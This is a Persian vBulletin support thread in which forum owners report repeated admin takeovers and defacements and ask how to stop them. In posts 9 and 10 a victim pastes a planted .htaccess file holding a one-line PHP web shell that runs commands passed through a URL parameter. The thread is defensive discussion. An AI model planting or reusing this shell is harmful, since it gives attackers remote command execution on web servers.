صفحه 1 از 2 12 آخرینآخرین
نمایش نتایج: از شماره 1 تا 10 , از مجموع 20

موضوع: این راه هک شدن ویبولتین رو چطور میشه بست؟

  1. #1
    تاریخ عضویت
    Oct 2013
    نوشته ها
    2
    سپاس ها
    1
    سپاس شده 0 در 0 پست

    پیش فرض این راه هک شدن ویبولتین رو چطور میشه بست؟

    سلام دوستان
    بار دومه دارم از این طریق هک میشم در طی یک هفته

    یه حساب کاربری عادی میان تازه ثبت نام می کنن و خیلی عجیب و خودکار می بینم ، طرف میشه مدیر کل (ادمین)
    بلافاصله میرم توی "گزارش کار کنترل پنل مدیریت کل" رو چک می کنم
    دو تا مطلب از توش متوجه میشم:
    1-هیچ یک از مدیران دیگر به اون کاربر دسترسی نداده و اصلا هیچ کدوم مدیران کاربر رو ادیت نکردند و اصلا اون کاربره 5 دقیقه ست که ثبت نام کرده
    2-می بینم کاربره که دسترسی ادمین به خودش داده رفته و از ادمین سی پی تغییراتی در plugin.php داده و هم import کرده و هم edit

    بعدشم می بینم سایتم دیفیس شده !!!!

    ورژن فرومم 4.1.12 هست و چون [برای مشاهده لینک ها عضو سایت شوید برای عضویت در سایت بر روی اینجا کلیک کنید] اختصاصی دارم و بهم میریزه نمی تونم آپگریدش کنم
    لطفا راهنمایی کنید تا حالا این مورد رو بهش بر خوردید و اینکه چه راهکاری داره که از این راه دیگه هک نشم
    خیلی ممنون از دوستان

  2. #2
    تاریخ عضویت
    Nov 2007
    محل سکونت
    کرج مهرویلا
    نوشته ها
    16,278
    سپاس ها
    3,268
    سپاس شده 22,446 در 9,367 پست

    پیش فرض پاسخ : این راه هک شدن ویبولتین رو چطور میشه بست؟

    نقل قول نوشته اصلی توسط Jason.Bourne نمایش پست ها
    سلام دوستان
    بار دومه دارم از این طریق هک میشم در طی یک هفته

    یه حساب کاربری عادی میان تازه ثبت نام می کنن و خیلی عجیب و خودکار می بینم ، طرف میشه مدیر کل (ادمین)
    بلافاصله میرم توی "گزارش کار کنترل پنل مدیریت کل" رو چک می کنم
    دو تا مطلب از توش متوجه میشم:
    1-هیچ یک از مدیران دیگر به اون کاربر دسترسی نداده و اصلا هیچ کدوم مدیران کاربر رو ادیت نکردند و اصلا اون کاربره 5 دقیقه ست که ثبت نام کرده
    2-می بینم کاربره که دسترسی ادمین به خودش داده رفته و از ادمین سی پی تغییراتی در plugin.php داده و هم import کرده و هم edit

    بعدشم می بینم سایتم دیفیس شده !!!!

    ورژن فرومم 4.1.12 هست و چون قالب اختصاصی دارم و بهم میریزه نمی تونم آپگریدش کنم
    لطفا راهنمایی کنید تا حالا این مورد رو بهش بر خوردید و اینکه چه راهکاری داره که از این راه دیگه هک نشم
    خیلی ممنون از دوستان
    این شخص میاد یک یوزر میسازه یا از طریق لینک ثبت نام یا از طریق دیتابیس ، سپس از همان طریق دیتابیس هم دست رسی ادمین میده ، برای همین ردی ازش نمی مونه
    از طریق پلاگین ها هم میاد شل اپلود می کنه و سایت و دیفیس میکنه
    باید یوزر و پسورد دیتابیس را تغییر بدید و از دست رسی به کانفیگ جلوگیری کنید
    دوستان و همکاران عزیز
    در پیغام خصوصی به سوالات و موارد شما پاسخ داده نخواهد شد
    مگر انهایی که کار طراحی دارند
    لطفا مزاحم نشوید و در سایت مطرح بکنید


    در روزگاری که لبخند آدمها بخاطر شکست توست ، برخیز تا بگریند آدمها ( کوروش کبیر )

    ساعات تماس : 10 & 14 - 18 & 23
    09386942162
    vbsaz.ir@gmail.com




  3. 2 کاربر از پست مفید mr.bahram سپاس کرده اند .

    Germanizer (10-12-2013), Jason.Bourne (10-12-2013)

  4. #3
    تاریخ عضویت
    Oct 2013
    نوشته ها
    2
    سپاس ها
    1
    سپاس شده 0 در 0 پست

    پیش فرض پاسخ : این راه هک شدن ویبولتین رو چطور میشه بست؟

    ممنون بهرام خان
    خب الان عیب کار من از کجا بوده که اینا انقدر راحت تونستن ما رو هک کن ؟
    یعنی انقدر راحت و بی در و پیکره هر کی بتونه از طریق دیتابیس یه یوزر برای خودش بسازه و ادمین بکنه؟

    من اتفاقا پسورد همه دیتابیس هام خیلی پیچیده و 16 کاراکتری هستند. چطور به دیتا بیس من دسترسی پیدا کردند؟

  5. #4
    تاریخ عضویت
    Nov 2007
    محل سکونت
    کرج مهرویلا
    نوشته ها
    16,278
    سپاس ها
    3,268
    سپاس شده 22,446 در 9,367 پست

    پیش فرض پاسخ : این راه هک شدن ویبولتین رو چطور میشه بست؟

    نقل قول نوشته اصلی توسط Jason.Bourne نمایش پست ها
    ممنون بهرام خان
    خب الان عیب کار من از کجا بوده که اینا انقدر راحت تونستن ما رو هک کن ؟
    یعنی انقدر راحت و بی در و پیکره هر کی بتونه از طریق دیتابیس یه یوزر برای خودش بسازه و ادمین بکنه؟

    من اتفاقا پسورد همه دیتابیس هام خیلی پیچیده و 16 کاراکتری هستند. چطور به دیتا بیس من دسترسی پیدا کردند؟
    از طریق دیتابیس هر سیستم مدیریت محتوایی را میتوان تغییر داد ، دیتابیس یعنی بانک اطلاعاتی
    یوزر و پسورد دیتابیس شما هرچیزی که باشد درون فایل کانفیگ قرار میگیرد و زمانی که این فایل کانفیگ خوانده شود به راحتی به دیتابیس میتوان نفوذ کرد
    ایراد کار شما میتونه از هرچیزی باشد
    هاست ، دادن اطلاعات هاست به افراد متفرقه و باگ های احتمالی در نسخه [برای مشاهده لینک ها عضو سایت شوید برای عضویت در سایت بر روی اینجا کلیک کنید]
    همه این ها را برسی کنید تا امنیت بالا رود
    دوستان و همکاران عزیز
    در پیغام خصوصی به سوالات و موارد شما پاسخ داده نخواهد شد
    مگر انهایی که کار طراحی دارند
    لطفا مزاحم نشوید و در سایت مطرح بکنید


    در روزگاری که لبخند آدمها بخاطر شکست توست ، برخیز تا بگریند آدمها ( کوروش کبیر )

    ساعات تماس : 10 & 14 - 18 & 23
    09386942162
    vbsaz.ir@gmail.com




  6. کاربر روبرو از پست مفید mr.bahram سپاس کرده است .

    Zeitoon (10-14-2013)

  7. #5
    تاریخ عضویت
    Jun 2011
    محل سکونت
    shiraz
    نوشته ها
    186
    سپاس ها
    89
    سپاس شده 25 در 16 پست

    پیش فرض پاسخ : این راه هک شدن ویبولتین رو چطور میشه بست؟

    نقل قول نوشته اصلی توسط mr.bahram نمایش پست ها
    این شخص میاد یک یوزر میسازه یا از طریق لینک ثبت نام یا از طریق دیتابیس ، سپس از همان طریق دیتابیس هم دست رسی ادمین میده ، برای همین ردی ازش نمی مونه
    از طریق پلاگین ها هم میاد شل اپلود می کنه و سایت و دیفیس میکنه
    باید یوزر و پسورد دیتابیس را تغییر بدید و از دست رسی به کانفیگ جلوگیری کنید
    با سلام
    از دسترسی به فایل کانفیگ جلوگیری کنیم - چطوری بود ؟ همون تغییر یوزر و پسورد ؟
    مرسی

  8. #6
    تاریخ عضویت
    Jun 2011
    نوشته ها
    85
    سپاس ها
    126
    سپاس شده 9 در 9 پست

    پیش فرض پاسخ : این راه هک شدن ویبولتین رو چطور میشه بست؟

    سلام
    ویبولتن من هم همین ورژنه و من هم دقیقن همین مشکلو دارم و هنوزم رفع نشده . فقط خودم به سی پنل و ادمین پنل دسترسی دارم و به هیچ کس دیگه ای هم رمز ندادم رمز رو عوض کردم باز هم میاد و خودشو ادمین میکنه و سایت رو دیفیس یا اینکه تو فایل فروم پی اچ پی خرابکاری میکنه و میره . امروزم اومده همه آی پی هایی که بن کرده بودم رو از تو سی پنل حذف کرده !
    ممکنه بفرمائید چطوری میتونم از دسترسی به فایل کانفیگ جلوگیری کنم؟ ممنون میشم راهنمایی کنید :)

  9. #7
    تاریخ عضویت
    Nov 2007
    محل سکونت
    کرج مهرویلا
    نوشته ها
    16,278
    سپاس ها
    3,268
    سپاس شده 22,446 در 9,367 پست

    پیش فرض پاسخ : این راه هک شدن ویبولتین رو چطور میشه بست؟

    نقل قول نوشته اصلی توسط h3n نمایش پست ها
    با سلام
    از دسترسی به فایل کانفیگ جلوگیری کنیم - چطوری بود ؟ همون تغییر یوزر و پسورد ؟
    مرسی
    شما باید برسی کنید ببیند درون هاست شما شل نباشد تا نتوان اطلاعات هاست شما را بصورت روت برسی کنند
    شما می توانید فایل کانفیگ را کد کنید تا در صورت وجود شل نیز نتوانند اطلاعات آن را مشاهده کنند ، برای این مورد یک سری برنامه هست که میتوانید ایمیل بزنید تا براتون کد کنم
    می توانید مسیر کانفیگ را نیز تغییر دهید تا مخفی باشد
    دوستان و همکاران عزیز
    در پیغام خصوصی به سوالات و موارد شما پاسخ داده نخواهد شد
    مگر انهایی که کار طراحی دارند
    لطفا مزاحم نشوید و در سایت مطرح بکنید


    در روزگاری که لبخند آدمها بخاطر شکست توست ، برخیز تا بگریند آدمها ( کوروش کبیر )

    ساعات تماس : 10 & 14 - 18 & 23
    09386942162
    vbsaz.ir@gmail.com




  10. 2 کاربر از پست مفید mr.bahram سپاس کرده اند .

    h3n (10-15-2013), Zeitoon (10-14-2013)

  11. #8
    تاریخ عضویت
    Nov 2007
    محل سکونت
    کرج مهرویلا
    نوشته ها
    16,278
    سپاس ها
    3,268
    سپاس شده 22,446 در 9,367 پست

    پیش فرض پاسخ : این راه هک شدن ویبولتین رو چطور میشه بست؟

    نقل قول نوشته اصلی توسط Zeitoon نمایش پست ها
    سلام
    ویبولتن من هم همین ورژنه و من هم دقیقن همین مشکلو دارم و هنوزم رفع نشده . فقط خودم به سی پنل و ادمین پنل دسترسی دارم و به هیچ کس دیگه ای هم رمز ندادم رمز رو عوض کردم باز هم میاد و خودشو ادمین میکنه و سایت رو دیفیس یا اینکه تو فایل فروم پی اچ پی خرابکاری میکنه و میره . امروزم اومده همه آی پی هایی که بن کرده بودم رو از تو سی پنل حذف کرده !
    ممکنه بفرمائید چطوری میتونم از دسترسی به فایل کانفیگ جلوگیری کنم؟ ممنون میشم راهنمایی کنید :)
    باز کردن ای پی هایی که از طریق سی پنل بن شده بوده توسط فایل htaccess صورت پذیر هست ، این مورد نشون میده شخص مورد نظر از طریق یک شل به هاست شما دست رسی داره باید بگردید و این نفوز را پیدا کنید
    مراحلی را که درون پست قبلی اشاره کردم را نیز میتوانید برسی کنید
    دوستان و همکاران عزیز
    در پیغام خصوصی به سوالات و موارد شما پاسخ داده نخواهد شد
    مگر انهایی که کار طراحی دارند
    لطفا مزاحم نشوید و در سایت مطرح بکنید


    در روزگاری که لبخند آدمها بخاطر شکست توست ، برخیز تا بگریند آدمها ( کوروش کبیر )

    ساعات تماس : 10 & 14 - 18 & 23
    09386942162
    vbsaz.ir@gmail.com




  12. کاربر روبرو از پست مفید mr.bahram سپاس کرده است .

    Zeitoon (10-14-2013)

  13. #9
    تاریخ عضویت
    Jun 2011
    نوشته ها
    85
    سپاس ها
    126
    سپاس شده 9 در 9 پست

    پیش فرض پاسخ : این راه هک شدن ویبولتین رو چطور میشه بست؟

    سلام
    چطور میتونم راه نفوذشو پیدا کنم؟ از کجا بفهمم این شل که شما میفرمائید چی هست و کجاست؟ امروز دوباره اومد و خودش رو ادمین کرد من از تو سی پنل گزارش گرفتم ببینم کجاها رفته که چند خط اولش از این قرار هست :
    31.59.14.134 - - [14/Oct/2013:19:54:55 +0330] "GET /forum/forum.php's-path/favicon.gif HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"
    31.59.14.134 - - [14/Oct/2013:19:54:55 +0330] "GET /forum/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"
    31.59.14.134 - - [14/Oct/2013:19:55:00 +0330] "GET /forum/forumdisplay.php/7-%D8%AA%D8%A7%D8%A8%D9%84%D9%88%DB%8C-%D8%A7%D8%B9%D9%84%D8%A7%D9%86%D8%A7%D8%AA HTTP/1.1" 200 22327 "..." "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"
    31.59.14.134 - - [14/Oct/2013:19:55:01 +0330] "GET /forum/images/buttons/sortarrow-asc.png HTTP/1.1" 304 - ".../7-%D8%AA%D8%A7%D8%A8%D9%84%D9%88%DB%8C-%D8%A7%D8%B9%D9%84%D8%A7%D9%86%D8%A7%D8%AA" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"
    31.59.14.134 - - [14/Oct/2013:19:55:01 +0330] "GET /forum/images/misc/tag.png HTTP/1.1" 304 - "..../7-%D8%AA%D8%A7%D8%A8%D9%84%D9%88%DB%8C-%D8%A7%D8%B9%D9%84%D8%A7%D9%86%D8%A7%D8%AA" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"

    با توجه به اینا شما میتونید کمکی بکنید؟ در مورد چگونگی پیدا کردن راه نفوذ و یا فایل شل هم توضیح بیشتر بدید ممنون میشم.
    باتشکر

    - - - Updated - - -

    در مورد اون فایل htaccess هم که فرمودین بعد از ورودش تو مسیر اصلی سی پنل ایجاد شده (چون ظهر چک کردم و نبود) اینم محتویاتشه

    <Files ~ "^\.ht">Order allow,denyAllow from all</Files>AddType application/x-httpd-php .htaccess# <?php passthru($_GET['cmd']); ?>
    ویرایش توسط Zeitoon : 06-25-2014 در ساعت 21:56

  14. #10
    تاریخ عضویت
    Nov 2007
    محل سکونت
    کرج مهرویلا
    نوشته ها
    16,278
    سپاس ها
    3,268
    سپاس شده 22,446 در 9,367 پست

    پیش فرض پاسخ : این راه هک شدن ویبولتین رو چطور میشه بست؟

    نقل قول نوشته اصلی توسط Zeitoon نمایش پست ها
    سلام
    چطور میتونم راه نفوذشو پیدا کنم؟ از کجا بفهمم این شل که شما میفرمائید چی هست و کجاست؟ امروز دوباره اومد و خودش رو ادمین کرد من از تو سی پنل گزارش گرفتم ببینم کجاها رفته که چند خط اولش از این قرار هست :
    31.59.14.134 - - [14/Oct/2013:19:54:55 +0330] "GET /forum/forum.php's-path/favicon.gif HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"
    31.59.14.134 - - [14/Oct/2013:19:54:55 +0330] "GET /forum/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"
    31.59.14.134 - - [14/Oct/2013:19:55:00 +0330] "GET /forum/forumdisplay.php/7-%D8%AA%D8%A7%D8%A8%D9%84%D9%88%DB%8C-%D8%A7%D8%B9%D9%84%D8%A7%D9%86%D8%A7%D8%AA HTTP/1.1" 200 22327 "http://asemaniha.co/forum/forum.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"
    31.59.14.134 - - [14/Oct/2013:19:55:01 +0330] "GET /forum/images/buttons/sortarrow-asc.png HTTP/1.1" 304 - "http://asemaniha.co/forum/forumdisplay.php/7-%D8%AA%D8%A7%D8%A8%D9%84%D9%88%DB%8C-%D8%A7%D8%B9%D9%84%D8%A7%D9%86%D8%A7%D8%AA" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"
    31.59.14.134 - - [14/Oct/2013:19:55:01 +0330] "GET /forum/images/misc/tag.png HTTP/1.1" 304 - "http://asemaniha.co/forum/forumdisplay.php/7-%D8%AA%D8%A7%D8%A8%D9%84%D9%88%DB%8C-%D8%A7%D8%B9%D9%84%D8%A7%D9%86%D8%A7%D8%AA" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36"

    با توجه به اینا شما میتونید کمکی بکنید؟ در مورد چگونگی پیدا کردن راه نفوذ و یا فایل شل هم توضیح بیشتر بدید ممنون میشم.
    باتشکر

    - - - Updated - - -

    در مورد اون فایل htaccess هم که فرمودین بعد از ورودش تو مسیر اصلی سی پنل ایجاد شده (چون ظهر چک کردم و نبود) اینم محتویاتشه

    <Files ~ "^\.ht">Order allow,denyAllow from all</Files>AddType application/x-httpd-php .htaccess# <?php passthru($_GET['cmd']); ?>
    اگر خواستید ایمیل ارسال کنید تا در این خصوص صحبت کنیم
    دوستان و همکاران عزیز
    در پیغام خصوصی به سوالات و موارد شما پاسخ داده نخواهد شد
    مگر انهایی که کار طراحی دارند
    لطفا مزاحم نشوید و در سایت مطرح بکنید


    در روزگاری که لبخند آدمها بخاطر شکست توست ، برخیز تا بگریند آدمها ( کوروش کبیر )

    ساعات تماس : 10 & 14 - 18 & 23
    09386942162
    vbsaz.ir@gmail.com




  15. کاربر روبرو از پست مفید mr.bahram سپاس کرده است .

    Erfan_vB (10-16-2013)

صفحه 1 از 2 12 آخرینآخرین

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

کلمات کلیدی این موضوع

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •